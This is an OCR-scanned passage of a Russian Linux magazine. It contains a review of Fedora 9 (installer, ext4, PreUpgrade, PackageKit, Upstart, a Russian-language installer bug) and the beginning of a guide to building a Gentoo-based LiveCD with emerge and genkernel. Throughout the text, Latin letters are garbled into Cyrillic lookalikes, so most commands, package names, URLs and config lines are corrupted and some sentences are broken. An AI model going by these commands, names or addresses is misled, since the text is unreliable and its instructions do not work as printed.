Еебога — один из первых дистрибутивов, перешедших на ядро 2.6. В нем 
впервые появилась поддержка 5ЕІ_іпих из коробки и использован собст- 
венный программный стек баѵа с открытым кодом, обеспечивающий улуч- 
шенную поддержку таких приложений, как ОрепОйісе.огд, Есіірзе, АрасЬе 
бакагіа и других. В общем, разработчикам Ребога есть чем похвастаться и 
что предложить пользователям. 

Как и в случае с орепЗІЮЕ, на Еебога обкатываются новые идеи и техноло- 
гии, которые затем появляются в РНЕБ. Каждому релизу обычно предшест- 
вуетЗ-4 предрелиза. Выигрывают от этого все: пользователи получают 
удобную современную систему, а РебНаІ — тщательно протестированные 
разработки. Но стоит заметить, что разработчики орепЗІбЗЕ менее свобод- 
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Мастер, встречающий пользователя послеустановки и перезагрузки 



ны в выборе и больше подконтрольны ІМоѵеІІ (о чем свидетельствует отток 
майтайнеров из этого проекта). В Ребога модель разработки более открыта. 
Непонятных рывков из стороны в сторону, как в орепЭІІЭЕ, не наблюдается. 

В ОБРАЗЫ И РЕЛИЗЫ 

Какуже было отмечено в интро, релиз под номером 9 получил кодовое имя 
ЭиІрЬиг. Потрадиции имя должно быть как-то связано с предыдущим ре- 
лизом. В ходе голосования из вариантов Зиірбиг, ВаіЬузрЬеге, Мауоппаізе, 
СбирасаЬга и других победила Сера. В мифологии она — одно из средств, 
отгоняющих оборотней. 

По сравнению с предыдущей версией поставка не изменилась. На страни- 
це закачки іебогадщесіжд/эМтІебога можно получить кактрадиционные 
СВ/ОѴО-образы, предназначенные для установки, так и І_іѵе-варианты. 
Поддерживаются платформы х86, х86_64 и Роѵѵег РС. Интересно, как 
распределились скачанные с сайта версии через неделю после релиза. 
Больше всего пользователи сливали универсальный вариант І386 — 77 %, 
х86_64 — 22 %. И лишь 1 % достался РоѵѵегРС. 

Закачать файлы можно через НТТР, ВііТоггепі и бідбо. Отмечу, что Ребога 
пошла по следам ІІЬііпІи. Иначе как можно объяснить появление Ребога 
ОізІгіЬіЛіоп Рго]ес* ( ІюбогаргощсРога/ѵѵікі/РізІгіЬиІіоп/РгееМебіа ). участ- 
ники которого раздаютдиски с дистром? Правда, еще до релизатам висело 
сообщение «Ребога Ргее Мебіа Ргодгат із по\л/СІ_05Р0. Ріеазе сбеск Ьаск 
пехі топіб». Да и в списке нет ни одной страны постсоветского пространс- 
тва... Но будем надеяться, что и до нас доберется халява. 

В І_іѵе-варианте возможен выбор между рабочими столами КОЕ4.0.3 и 
ѲКІОМЕ 2.22. Таким образом, Ребога можно смело назвать первым дистри- 
бутивом, разработчики которого рискнули полностью перейти на КйР новой 
ветки. Возможно, потому, что в Ребога основным всегда был гном. А может, 
разработчики уже уверены в стабильности новой среды. Кстати, в КІІЬипіи 
8.04, который вышел за две неделидо релиза Ребога, предложено два вари- 
анта: с новым и старым КБЕ. 

Образ ЫѵеСО можно запускать нетолько с привода, но и с ІІЗВ-девайса. В 
последнем случае понадобится утилита Ііѵессі-ізо-іо-сіізк, которая 
доступна в пакете Ііѵесд-ѣооіз или в каталоге ЫѵеОЗ образа. Пользо- 
ваться ей очень просто: 

$ . /1іѵесс1-ізо-Со-с1ізк --оѵегІау-зіге-шЬ 1200 \ 
/раЫт/Со/ізо /сІеѵ/зсІЫ 

Как и в других подобных решениях, вариант Ыѵе позволяетустановить дис- 
трибутив на жесткий диск компьютера. Прямо на рабочем столе расположен 
ярлык мастера. 

Количество дистрибутивов в РебогаЗріпз ( зріпзбебогаргоіесі.огд ) возросло. 
Теперь здесь имеются версии сХРСЕ и игровой Ѳагпез, для разработчиков 
— Оеѵеіорег, для инженеров-электронщиков — Ребога Еіесіхопіс Баб (РЕІ_) и 
некоторые другие. Правда, номер их версии по-прежнему остался «8». 



ир.дгі.гі* упі_*г іунТ*ПЪ 




Преапгрейд позволяетснизить рискпри обновлении системы 

г ЧТО НОВОГО В ДЕВЯТКЕ 

Разработчики в очередной раз порадовали обилием новинок. Перерабо- 
тана программа установки Апасопба, в том числе изменена последова- 
тельность некоторых операций. Разметка диска теперь производится до 
выбора пакетов, сеть тоже настраивается в самом начале. При создании 
разделов можно изменить размер файловых систем ех!2/3 и ЫТР5, перейти 
с І_ѴМ на І_ѴМ2. РеізегРЭ и ХР5 для форматирования не предлагаются, но 
есть возможность установить систему на подготовленный заранее раздел. 
Крометого, в Анаконде появилась поддержка шифрованных файловых 
систем и ехЫ. 

Программа для преобразования ехіЗ в ехі4 пока находится в стадии 
разработки и не входит в е2кзргодз (и это несмотря на то, что экспери- 
ментальная поддержка ехі4 впервые была выпущена в виде патча для ядра 
2.6.1 9 в конце 2006 года Эндрю Мортоном). Хотя можно просто монтиро- 
вать имеющиеся разделы ехіЗ какехЫ, но для обратного преобразования 
придется удалить все новые файлы и отключить флаг ЕХТЕШЗ. Кстати, ехЫ 
основана на ехіЗ и также является журналируемой. Максимальный объем 
раздела диска в новой файловой системеувеличен до 1 эксабайта (2 Л 60 
байт), а максимальный размерфайла —до 1 6 Тб. Появились расширенные 
атрибуты для ЭЕІІпих, Ьеадіе, ЭатЬа и некоторых других приложений. В 
ряде операций (вроде удаления больших файлов) ехЫ быстрее ехіЗ. Во 
избежание фрагментации и для повышения производительности данные 
добавляются в конецзаранее выделенной области рядом с файлом. Все это 
доступно без пересборокядра и лишнихтелодвижений. 

Отметим появление в Ребога 9 возможности преапгрейда Ребогаргоіесі. 
огд/ѵѵі кі/РгеЦ рд габе ) . Теперь можно не скачивать весь дистрибутив, а 
просто произвести загрузкутех пакетов, которыетребуютобновления. Риск 
оказаться с неработающей системой, какэто случалось при «уипп ирдгабе», 
сведен к минимуму. Команды просты: 

# ушп ирсІаСе 

# ушп іпзСаІІ ргеирдгасіе 

# ргеирдгасіе 

В появившемся окне выбираем вариант Ребога, до которого хотим 
модернизировать систему. Текущая версия РгеІІрдгабе поддерживает 
обновление Ребога 7 и 8. После закачки пакетов перезагружаем систему и 
встречаем Анаконду. 

В состав Сульфура включена универсальная оболочка для управления 
пакетами РаскадеКі* ( раскадекіТогд ) — своеобразная надстройка над 
стандартными средствами УІІМ, АРТ, сопагу, Ьох, аірт, зтагі, різі, гурр и 
прочими. Это абстрактный слой для Б-Виз. Он позволяет пользователю 
управлять пакетами через независимый отдистрибутива и архитектуры АРІ. 
Для удобства управления предлагается консольный интерфейс и два вари- 
анта графического: дпоте-раскадекк для 6ІЧ0МЕ и ОРаскадеКІІ; для КйЕ. 

В Р9 интегрирована система управления правами пользователей РоІісуКіі 
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[ ЬаІігеесІезкІор.огд/сІосз/РоІісѵКІІ: ). назначение которой — повышение 
безопасности; осуществляется за счет гибкого доступа кдействиям, 
требующим наличия прав гооі’а. Другими словами, административные 
приложения могут за пускаться от имени обычного пользователя и получать 
дополнительные привилегии динамически — исключительно на необ- 
ходимые операции. Некоторые утилиты, вроде РаскадеКй и ѲѴЕ5, уже 
используют РоІісуКІЕ 

Раз уж речь за шла о безопасности, скажем иопоявлении системы управ- 
ления РгееІРА, объединяющей Ыпих, Еебога Оігесіогу Зегѵег, МІТ КегЬегоз, 
ЫТР, РЫБ. Всеоперации производятся при помощи утилит командной стро- 
ки и веб-интерфейса. 

Вместо киски используется оценка аппаратного обеспечения средствами 
НАІ_ и ибеѵ. 

Система инициализации также претерпела изменения. Теперь вместо 
древнего /зЬіп/іпіѣ используется Іірзіагі [ ирзІаН.иЬипІи.сот ]. впер- 
вые появившийся в ІІЬипіи 6.1 0 «Ебду ЕЙ». Такая событийная (еѵепІ-Ьазеб) 
система стартует сервис по запросу, то есть когда он действительно нужен. 
Результат — система загружается на порядок быстрее, хотя, субъективно 
говоря, ІІЬипІи догнать пока неудалось. Да, вследствие этих изменений 
/еію/іпійаб теперь можно не искать. 

Команда «и па те -г» показывает наличие ядра версии 2.6.25-14, которое 
изначально поддерживает Хеп. При сбое дампы ядра могут автоматически 
отправляться на ѵѵѵѵѵѵ.кегпеіоорз.огд для устранения ошибок. 

Запуск и останов сервера ХОгд версии 1 .4.99.901 теперь выполняются 
заметно шустрее. 

В СЕРНЫЕ ЖУКИ 

Ксожалению, не обошлось и без багов. В процессетестирования Ребога 9 
не сумели выявить досадную ошибку: при использовании русского языка 
завершить процесс установки не удается! Описание можно найти по адресу 
Іебогаргоіесі.огд/ѵѵікі/ги РЦ/РеІеазез/9/І пз1:а Иа1:іоп Ра ііеб . Суть проста. 

При установке на русском языке (при попытке выбрать некоторые группы 
пакетов) программа уходит в аут. Причем, это проявляется как в графи- 
ческом режиме, так и втекстовом. В ближайшее время планируется выход 
обновленного набора установочных носителей. Обойти ошибку можно 
несколькими способами. Например, производитьустановку на английском. 
Если с языком Шекспира не сложилось, то просто ставьсистему, какесть, 
с пакетами, предлагаемыми поумолчанию. Ауже потом в рабочей системе 
полируй до нужной кондиции. По ссылке можно найти пакет исправлений, 
который следуетзаписать на носитель и устанавливать с параметром 
«ирбаіез». 

Кроме этого, при установке с ЫѵеСО-варианта, после перезагрузки на вто- 
ром этапе, когда необходимо ввести имя пользователя и пароль, почему-то 
не работает переключатель клавиатуры. Хотя в хогд. сопИ все выглядит 
правильным: 



ОрЪіоп " ХкЬЬау оик " "из,ги" 

ОрЪіоп "ХкЬОрЪіопз " "дгр: зЪ.і:ЕЦз_Ьодд1е , дгр_1ес! : зсгоіі" 

Символы кириллицы инсталлятор принимать отказался напрочь. Пришлось 
на пароль и логин вводитьтолько цифры. Хотя Анаконда и ругалась на их 
простоту, это позволило довести процесс до победного. Затем уже в рабо- 
чей системе создал нового юзера с нормальным логином и пассвордом. 
Кстати, не забудь исправить на: 

ОрЪіоп " ХкЬЬау оиЪ " "из , ги Стпкеуз ) " 

— чтобы точка и запятая были на своем месте. 

Также замечены проблемы с проверкой орфографии в некоторых приложе- 
ниях под 6КІ0МЕ, например, Еѵоіийоп и дадт. Впрочем, в гноме проблемы 
с локализациями случаются через релиз. 

Н ЗНАКОМИМСЯ БЛИЖЕ 

Рабочий стол в обеих средах внешне мало изменился. Таже Ыобока с но- 
выми обоями. Правда, на кнопке развертывания окна вместо привычного 
прямоугольника зачем-то прилепили крестик. Поначалу, нажимая на нее, 
думаешь — «окно свернется или закроется». Как и раньше, на рабочий стол 
помещен ярлык«Компьютер», открывающий доступ к разделам жесткого 
диска. В Е8тутсразуже появлялись ссылки на сетевые ресурсы, в Е9 их нет. 
Наличие драйверов КІТЕ5-36 означает возможность нетолько чтения, но и 
записи в раздел с файловой системой КІТЕ5. Имена файлов на кириллице 
выводятся корректно. С определением оборудования проблем не возникло 

— все было распознано и настроено. 

При попытке проиграть файлы в форматах ѴѴМА и МРЗ стартовал Тоіет; коде- 
ка в системе, естественно, нет, но его было предложено установить. Форматы 
Одд ѴогЬіз, ТИеога, Зреех и ЕЕАС поддерживаются изначально. Остальное 



Один из перелом- 
ных моментов 

КесІНаі: 8.0 (РзусЪе) стал первым дистрибутивом Ілпих, в котором 
официально были исключены приложения с закрытой лицен- 
зией, в том числе и популярные кодеки МРЗ. Хотя, учитывая 
его американские корни, ничего удивительного нет. Такой шаг 
вызвал негодование пользователей и появление многочислен- 
ных «НОѴѴТО», рассказывающих, как добавить в систему нужные 
кодеки. 
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можно найти в репозитарии І_іѵпа ( грт.ііѵпа.огд ). в котором есть 
мультимедиа кодеки и приложения, отсутствующие в стандарт- 
ном репозитарии. Подключить Біѵпа очень просто: 

$ зи -с 1 грт -іѵЪ. ЫзОр : / /грт. Ііѵпа . огд/ііѵпа- 

ге1еазе-9 . грт' 

Уничтожишь менеджер пакетов по функциональности явно 
уступает Супа рбе, но свои задачи выполняет добротно. О нали- 
чии обновлений сигнализируетспециальный апплет. 
Проанализировав весенние релизы дистрибутивов этого года, 
можно сделать вывод, что решения с рабочим столом 6ІМ0МЕ 
имеют гораздо больше новинок и положительных отзывов 
сообщества. Что совершенно неудивляет. Развитие КОЕЗ.х 
фактически прекращено, а КйЕ4еще не набрал критической 
массы и стабильностью не радует. Зато в 6Ы0МЕ2.22 новых 
фичей не на один обзор. На смену ѲЫ0МЕ-ѴЕ5 пришла вирту- 
альная файловая система 6ѴЕ5, работающая прозрачно с сетью 
(5ЕТР, РТР, ОАѴ, 5МВ, ОЬехЕТР). Основные ее приложения уже 
используют 0ѴЕ5. Благодаря этой среде, файловый менеджер 
ІМаибІиз избавился от некоторых своих недостатков вроде 
невозможности восстановления файлов из корзины — да и стал 



чуточку шустрее. 6ѴЕ5 также обеспечивает монтирование БІІ5Е 
к $НОМЕ/ .дѵкз (этим могут пользоваться старые приложения, 
поддерживающие обычные функции ввода-вывода Р05ІХ). 
Главное, о чем следует помнить, что, в отличие от 6Ы0МЕ-ѴЕ5, 
соединения в 6ѴЕ5 сохраняют состояние, и пользователь вводит 
па роль только один раз. Здесь нужно быть внимательным: ведь 
удалив подкаталог в $НОМЕ/ .дѵИз (или весь $номе), при нали- 
чии прав ты уничтожишь и файлы на удаленном сервере. 

В состав 6КІ0МЕ вход итути лита СНеезе для работы с веб- 
камерами, захвата и редактирования видео. Новый Еѵоіиііоп 
получил поддержку Соодіе Саіепсіагз и научился назначать 
письмам собственные метки. Кстати, гном стал композитным 
оконным менеджером. Возможности пока скромные (тени, 
предпросмотр по <АІЧ+ТаЬ> и некоторые эффекты прозрачнос- 
ти), но, очевидно, это только начало. 

В стандартные часы рабочего стола интегрирован апплет 
іпѣісіоск — теперь кроме локального времени и календаря 
отображаются время и погода вуказанныхточках планеты. 

В роли основного браузера используется Рі гебох 3 Ве1:а 5 с 
поддержкой родного 6ТК-оформления. 

В менеджере сети МеІѵѵогкМападег появились новые пункты, 
при помощи которых можно создавать подключения к65М и 
СОМА-сетям, настраивать ѴРЫ и 
05І_-соединения, а также буквально 
двумя щелчками мыши поднимать 
точки доступа ѴѴІ-Бі. 

Звуковой сервер РиІзеАисІіо, поя- 
вившийся в предыдущей версии, 
теперь стал стандартным. Настройка 
некоторых его параметров произ- 
водится при помощи графической 
утилиты РиІзеАисІіо Ѵоіите Сопіхоі. 

В ЗАКЛЮЧЕНИЕ 

Релиз, несмотря на некоторые 
недочеты, вроде бага с программой 
установки и большей возней при 
установке кодеков, удался на славу. 
Сторонники КБЕ и 6Ы0МЕ, думаю, 
положительно оценят все нововве- 
дения. Впрочем, прогресс не стоит 
на месте. Уже опубликована специ- 
фикация следующего релиза Еебога 
1 0, выпуск которого планируется в 
конце октября. ЗИ 



Еебога — первый дистр, разработчики которого отказались от КБЕ 3 




/ X ' ' * «ч Я 22:10 



^ ипіхоісі 




> Іп^о 

• Помимо рабочих 
сред КйЕ и СЫОМЕ, в 
Еебога 9 присутствует 
обновленный Хке 

4.4.2. 

• ІсесІТеа (полностью 
открытый Заѵа- 
пакет) заменен на 
Заѵа ОрепЗйК 6. 

• Наличие драйверов 
КІТБ5-36 означает 
возможность нетолько 
чтения, но и записи 

в раздел с файловой 
системой ЫТЕ5. 

• Обзор КйЕ 4 читай в 
январском номере ][ 
за 2008 год. 

• Следующий релиз 
Еебога 10 планируется 
28 октября 2008 года. 




> Ипкз 



Поиск информации 
по дистрибутиву сле- 
дует начинать с ѴѴІкі 
проекта ІесІогарго]есБ 
о гд/ѵѵі кі/ги ВЦ . 




> ѵѵагпіпд 

Сразу после выхода 
Сульфура был обнару- 
жен баг в программе 
установки, описание 
которого можно 
найти по адресу 
^ебогаргоіесС огд/ѵѵікі/ 
ги ВЦ/ВеІеазез/9/ 
ІпзІаІІаІіопЕаіІесІ . 
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^ ипіхоісі 



Все с вое 
ношу с собой 






СОБИРАЕМ ЫѴЕСБ НА БАЗЕ 6ЕИТ00 І_ШЦХ 



ьТебе нравится идея ІлѵеСЭ? Ты уже давно подумываешь о том, как со здать 
зевой идеа льный дистрибутив? Эта статья специально для тебя. Сдела й свой 
іственный диск. Наполни его самыми полезными и актуальными щю-І 
)амма ми, бери его с собой и раздавай друзьям. Почувствуй себя нас тоя- 
щіе дистростроителем! 



4 . Утилита для работы со сжатой файловой системой 




В ВВЕДЕНИЕ 




Без преувеличения можно сказать, что все, кто хотя бы мало-мальски 
знаком с Ыпих-системами, видели и знают, что такое ЫѵеСО. Гибкость и 
возможности применения живых дистрибутивов сложно недооценить. 
Кроме основного их назначения — служить своего рода реаниматорами 
— существуют версии, разработанные для запуска игр, просмотра БѴБ, про- 
слушивания музыки, проверки безопасности сети, обучения ит.д. 
Администраторы применяют ЫѵеСО для восстановления сбойных систем. 
Программист, создав свой проект, можетзаписать его на ЫѵеСО и пойти на 
встречу кзаказчику. Ну а рядовому пользователю просто приятно иметь при 
себезаточенный под его нужды дисксо всеми необходимыми для работы 
программами. ЫѵеСО активно применяются нетолько в ІТ-сфере, но и на 
производстве. Например, разработчики игровых автоматов и электронных 
киосков для упрощения обновления внутреннего ПО используют в своих 
изделиях вместо жестких дисков связку СОПОМ+ЫѵеСО. 

Сегодня мы рассмотрим, как можно собрать свой собственный ЫѵеСО. В 
качестве основы будет использоваться мета дистрибутив Ѳепіоо Ыпих, 
который славится невероятной гибкостью настройки, скоростью и проду- 
манностью инструментов. Абсолютно все программы, начиная от архива- 
тора и заканчивая КОЕ, мы будем компилировать из исходников. После 
выполнения всех пунктову нас получится полностью русифицированный 
ЫѵеСО-диск, включающий все необходимые драйверы, программы, КОЕ, 
поддерживающий автомонтирование съемныхустройств и обладающий 
всеми преимуществами обычного «настольного» дистрибутива. В будущем 
этотдиск можно бесконечноулучшать, настраивать, обновлять. В общем, 
работать с ним, как с обычной ОС. 

Н ПОДГОТОВКА 

Итак, нам понадобится: 

1 . Архив второй стадии 

2 . Свежий набор портеджей 

3 . Коллекция исходных текстов программ 



здиазМз и программа записи СБ-дисков 
5 . Приблизительно 12 часов терпения 

Первыетри пункта можно слитьслюбогозеркала Ѳепіюо. 

Чтобы получить современную, полностью работоспособную систему с КОЕ, 
нужно будетскачать около 600 Мб файлов с исходными текстами. Чита- 
тели, у которых доступ в Сеть не безлимитный, сейчас возможно немного 
расстроились, и этозря. Мы скачали и записали на прилагаемый кжурналу 
дисксамые актуальные на начало мая 2008-го года исходные файлы. 
Четвертый пункт ставится имеющимися средствами используемой ОС. 

В Сепіоо это делается так: 

# етегде -аѵ здиазМз-бооІз сбгбооіз 

Теперь по пункту пять — или про 12 часов терпения. Ѳепіоо относится к 
разряду так называемых Зоигсе ВавесІ дистрибутивов. Основная идея, 
лежащая в основе Сепіоо, — компиляция всех пакетов из исходников на 
компьютере пользователя. Основным преимуществом такого подхода 
будетто, что все собранное ПО наилучшим образом оптимизировано под 
архитектуру компьютера, на котором оно собиралось. А минусы — уста- 
новка программ потребует гораздо больше времени, чем в «обычных» 
дистрибутивах. Но здесь все зависит от мощности используемого тобой 
компа. 

Двенадцать часов — это суммарное время компиляции всех программ на 
моем АМБ Би гоп 2500 с 1 Гб ОЗУ. Если у тебя более мощная машина, следо- 
вательно, затратишь меньше времени. Особенно, еслиутебя многоядерная 
или многопроцессорная система. Опытным путем проверено, что сборка 
идет ровно в два раза быстрее, чем на аналогичной однопроцессорной. 
Чтобы ты мог планировать свое время, я буду указывать длительность ком- 
пиляции на различных стадиях. 

Хотя в качестве ЬозЫсистемы здесь описывается Оепіюо — это не принци- 
пиально, собирать такой ЫѵеСО можно на любом дистрибутиве. 
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Сам процесс сборки несложен, и его можно разделить на 
следующие этапы: 

1. Создание дерева каталогов, распаковка архи- 
ва второй стадии и набора портеджей 
2 . Базовая настройка второй стадии и сборка из 
него третьей 

3. Сборка и установка ядра, настройка загрузчика. 

4 . Установка скриптов для автоматического кон- 
фигурирования оборудования 

5 . Настройка автоматического входа в систему 

6. Создание первого 130 образа и проверка его 
работоспособности 

7 . Сборка КБЕ , русификация , установка ТгиеТуре 
шрифтов 

8 . Настройка автоматического входа для КБМ и 
тонкая настройка КБЕ 

9 . Установка дополнительных приложений 

Подробно рассмотрим каждый из них. 

Ё СОЗДАНИЕ ДЕРЕВА КАТАЛОГОВ, РАСПАКОВКА 
АРХИВА ВТОРОЙ СТАДИИ И НАБОРА ПОРТЕДЖЕЙ 

Для сборки ЫѵеСО и последующей удобной его поддержки 
нужно продумать и создать структуру каталогов, где будет 
проходить сборка и обновление системы. Для себя я сделал 
такой выбор: 

' -- Ііѵессі 
I -- сопб 
I -- бізбгіЪ 
I -- зсгірбз 
I -- зоигсе 
' -- багдеб 

В директории сопб будем собиратьсвои конфигурационные 
файлы. В бізбгіЪ скопируем то, из чего, собственно, избира- 
ется ЫѵеСО — набор портеджей, архив второй стадии, исходные 
файлы всех необходимых пакетов и, возможно, какие-то картин- 
ки и прочий пользовательский контент. Директория зсгірбз 
предназначена для сборочных и вспомогательных скриптов. 
Каталог Та гдеі нужен для обработки готового дистрибутива и 
создания из него образа для записи на СО. Под «обработкой» 
подразумевается удаление сборочных каталогов, файлов 
справки, исходников ядра и прочих вещей, которые не нужны на 
ЫѵеСО, и, удалив их, мы получим больше места для других фай- 
лов и программ. Сам дистрибутив будет находиться в каталоге 
воигсе. Дерево каталогов нужно распаковать на жесткий диск. 
Куда распаковывать, в принципе, без разницы, лишь бы на 
этом разделе было свободно, как минимум, 5 Гб. 

Переходим в корень созданного дерева. Все последующие 
шаги будут выполняться именно здесь. 

$ ссі -/Ііѵессі 

Принимаемся за архив второй стадии и набор портеджей: 

# баг -С зоигсе -рх^ѵб 
с!ізбгіЪ/збаде2-і686-2 007 . О . баг .Ьг2 

# баг -С зоигсе/изг -х;іѵб 
сІізбгіЪ/рогбаде-2 0080321 . баг . Ьз2 

Н БАЗОВАЯ НАСТРОЙКА ВТОРОЙ 
СТАДИИ И СБОРКАТРЕТЬЕЙ 

Сейчас система распакована в каталогзоигсе. Можно пере- 
ходить (как еще говорят, сбгообиться) в собираемую систему 



и начинать подгонять ее под свои запросы. Но перед этим дам 
маленький совет. Работа в зоигсе-окружении будет занимать 
большую часть времени, и чтобы легко отличать консоль в 
песочнице от консоли основной системы, рекомендую для 
первой изменить приглашение командной строки и вместо 
«#» написать, например, « (БІѴЕСБ) #». Для этого копируем 
заготовленный в сопб директории файл гооб/ЬазЫгс в ката- 
лог зоигсе/гооб/ (добавив в начало названияточку). 

# ср сопб/гооб/ЪазЪхс зоигсе/гооб/ . ЪазЬгс 

Также скопируем в зоигсе/гооб скрипт ргераге. Он поможет 
нам провести базовую настройку и русификацию нашего 
дистрибутива. 

# ср зсгірбз/іпзіс!е_1іѵесс1/ргераге зоигсе/ 
гооб/ 

Если ты планируешь из сЬгооЫокружения качать какие-то 
файлы из Сети, тогда предварительно скопируй конфиг /ебс/ 
гезоіѵ. сопб в зошгсе/ебс: 

# ср /ебс/гезоіѵ. сопб зоигсе/ебс/ 

Переходим в сбгооЫокружение: 

# ссі зсгірбз 

# . /епбег 

Если все прошло нормально,™ на экране не должно быть 
никаких ругательных сообщений, а приглашение командной 
строки будет вы гл я деть та к: 

(БІѴЕСБ) # 

Сейчас мы находимся втолько что распакованной из зіаде2 
системе. Общий план дальнейших действий таков: 

1. Установить имя машины / домена , профиль, до- 
писать БЗЕ флагов в таке. сопб, создать /ебс/ 
бзбаЬ 

2 . Установить часовой пояс , перевести часы в 
режим Босаі , сгенерировать русские локали, 
установить русскую раскладку клавиатуры и эк- 
ранный шрифт 

3 . Выполнить «етегде -е зузбет» и «етегде -е 
члгогісі» для получения ЗбадеЗ 

4. Не забыть установить пароль гооб' у 

Первые два пункта за нас выполнит ргераге. Открой этот 
скрипт в текстовом редакторе и убедись, что тебя все устраи- 
вает (например, название Ііѵессі, переключатель раскладки 
клавиатуры и п р.) . Итак, начинаем: 

1. Подготавливаем и русифицируем систему: 

(БІѴЕСБ) # /гооб/ргераге 

2 . Уста на вливаем основные утилиты для управления пакета- 
ми: 

(БІѴЕСБ) # етегде -аѵ депбооікіб 

Примечание: при первом запуске команды етегде по экрану 
должны проскочить текстовые блоки вида «Регбогтіпд 
СІоЬаІ Брбабез : . . .» — это нормально. 




> \піо 

Из Википедии: 
«Дистрибутив ЕіѵеСй 
— сборка операцион- 
ной системы, которая 
н е требует уста н о в ки 
на винчестер, а для 
ее запуска требует- 
ся лишь вставить в 
привод Сй- РОМ диск 
с дистрибутивом и 
настроить в ВІ05 
загрузку с Сй-РОМ, 
после чего перезагру- 
зить компьютер». 




> Ипкз 

• Дополнительную 
информацию отом, 
как работать с Сепіоо 

и конкретно с утилитой 
для управления 
пакетами етегде, ты 
можешь получить на 
официальном сайте 
Ѳепіоо — ѵѵѵѵѵѵ.депіоо. 
огд/сіос/ги/ . 

• Настоятельно реко- 
мендую ознакомиться 
с книгой «Сборник 
статей о Сепіоо Ыпих», 
содержащей более 
800 страниц отборной 
русскоязычной доку- 
ментации. Скачать ее 

в различных форматах 
можно по адресу: сосіе. 
доод Іе. со т/р/де піоо- 
сіос/сіоѵѵпіоасіз/іізб 
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3. Собираем ЗіадеЗ. На момент написания статьи в дистрибутиве замечен 
небольшой нюанс сустановкой Регі, поэтому перед выполнением «етегде 
-е зузЬет» необходимо выполнить следующее: 

(ЬІѴЕСБ) # етегде --опезТюЬ дсПэт сІЪ 
(ЬІѴЕСБ) # етегде -Ы --опезТюЬ --посіерз регі 

Пересобираем систему: 

(ЬІѴЕСБ) # етегде -е зузЬет 

Возможно, где-то на середине сборка зузЬет прервется с ошибкой на 
пакете зуз-аррз/аЬЬг. Выглядеть ошибка будеттак: «ІіЪехраЬ . зо . О : 
саппоЬ ореп зкагесі окдесЬз Тііе: N 0 зисЪ. Іііе ог сІігесЬогу». 
Если это случилось, создаем символическую ссылку с ІіЪехраЬ. зо на 
ІіЪехраЬ . зо . О и пробуем продолжить сборку: 

(ЬІѴЕСБ) # 1п -з /изг/ІіЬ/ІіЬехраС . зо /изг/ ІіЪ/ ІіЪехраЬ . зо . О 
(ЬІѴЕСБ) # етегде --гезите 

Обновляем конфигурационные файлы установленных приложений: 
(ЬІѴЕСБ) # ЪізраЬсЪ-сопЬ 

Здесь нужно быть внимательным и не затереть те конфигурационные 
файлы, которые мы сами изменяли (или их изменил скрипт ргераге). 



Версии основных 

используемых 

пакетов 

зуз-Ьз/здиазЪЬз-Ьоо1з-3 . 1_р2 
арр-тізс/1іѵесс1-Ьоо1з-1 . О . 40_рге1 
зуз-кегпе1/депкегпе1-3 . 4 . 10_рге7 
зуз-кегпе1/депЬоо-зоигсез-2 . 6 . 24-гЗ 
зуз-аррз/ЪчлкіаЬа-депЬоо-0 . 3 
зуз-аррз/ЪмзеЬир-1 . 2 
х11-тізс/ткхЬ86сопЬід-0 .9.9 

зЬаде2-і686-2007 . О . Саг .Ът.2 
рогЬаде-2 008 0321 . Ьаг .Ъг2 

► 088 



Это касается русского шрифта, раскладки клавиатуры и прочего. В общем, 
прежде чем в ответ на вопрос бізраІсИ-сопГа жать 'и', внимательно посмот- 
ри, какой файл он хочетобновить. Если это файлы: сіоск, сопзоІеЬопЬ, 
ЪозЬпатеили кеутарз, — жми ' 2 ' (не обновлять). 

Проверяем целостность зависимостей системы: 

(ЬІѴЕСБ) # геѵйер-геЪиіІсІ 

Тоже самое и про мир. Пересобираем, обновляем конфигурационные 
файлы, проверяем целостностьзависимостей: 

(ЬІѴЕСБ) # етегде -е тлгогісі 
(ЬІѴЕСБ) # ЪізраЬсЪ-сопЬ 
(ЬІѴЕСБ) # геѵсІер-геЪиіІс! 

Пересборка зузіет на АМй Оигоп 2500 заняла 4 часа 30 мин.ѵѵогісі — 4часа 
20 минут. 

4 . Задаем пароль гооЕа: 

(ЬІѴЕСБ) # раззчлкі 

В СБОРКА И УСТАНОВКА ЯДРА, ПЛЮС НАСТРОЙКА ЗАГРУЗЧИКА 

Устанавливаем и компилируем ядро: 

(ЬІѴЕСБ) # етегде -аѵ депЬоо-зоигсез 

Уста на вливаем утилиту для автоматической сборки ядра: 

(ЬІѴЕСБ) # етегде -аѵ депкегпеі 

Пакет депкегпеі должен быть >=3.4.1 0_рге4. На моментнаписания статьи 
такой версии встабильной ветке не было. Еслиутебятоже самое, разреша- 
ем устанавливать его изтестовой (~х86). Для этого ВЫПОЛНИМ: 

(ЬІѴЕСБ) # есію ' зуз-кегпеі /депкегпеі ~х86 ' » \ 
/еЬс/рогЬаде/раскаде . кеуѵгогсіз 

Устанавливаем зріазб-темы для красивой графической загрузки: 

(ЬІѴЕСБ) # етегде -аѵ зрІазЪ-ЬЪетез-Ііѵесс! 

Собираем ядро: 

(ЬІѴЕСБ) # депкегпеі аіі --теписопЬід --зр1азЪ=1іѵесс1- 
2007 . 0 
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Появится стандартный диалог настройки ядра. Если что-то нужно изменить 
— меняем. Если нет— выбираем ехіь и выходим. 

Сборка на АМИ Оигоп 2500 заняла 45 минут, та к что за пасись терпением. 
Устанавливаем загрузчик: 

(ЬІѴЕСБ) # ешегде -аѵ зузііпих 
( ЬІѴЕСБ) # тксііг /ЪооЬ/ізоІіпих 

(ЬІѴЕСБ) # ср /изг/1іЬ/зуз1іпих/ізо1іпих.Ьіп /ЪооЬ/ 
ізоііпих 

(ЬІѴЕСБ) # ср /ЪооЬ/кегпе1-депкегпе1-х86-2 . 6 . 24-депЬоо- 
гЗ /Ъоок/ізоііпих/ѵтііпиг 

(ЬІѴЕСБ) # ср /ЪооЬ/іпіЬгатіз-депкегпе1-х86- 
2 . 6 . 24-депЬоо-гЗ \ 

/ЪооЬ/ізоІіпих/іпіЬгсІ. ідг 

Из директории с конфигурационными файлами копируем в /ЪооЬ/ 
ізоііпих файл ізоііпих . сід. 

В УСТАНАВЛИВАЕМ И ДОБАВЛЯЕМ 
В АВТОЗАГРУЗКУ 6ЕЫТ00 ЫѴЕСО СКРИПТЫ 

Снимаем маскировку (установлена разработчиками, чтобы предупредить о 
том, что скрипты предназначены только для использования вместе с Ііѵессі): 

(ЬІѴЕСБ) # есЪ.о ' арр-тізс/1іѵесс1-Ьоо1з ' » /еЬс/рогЬаде/ 
раскаде . иптазк 

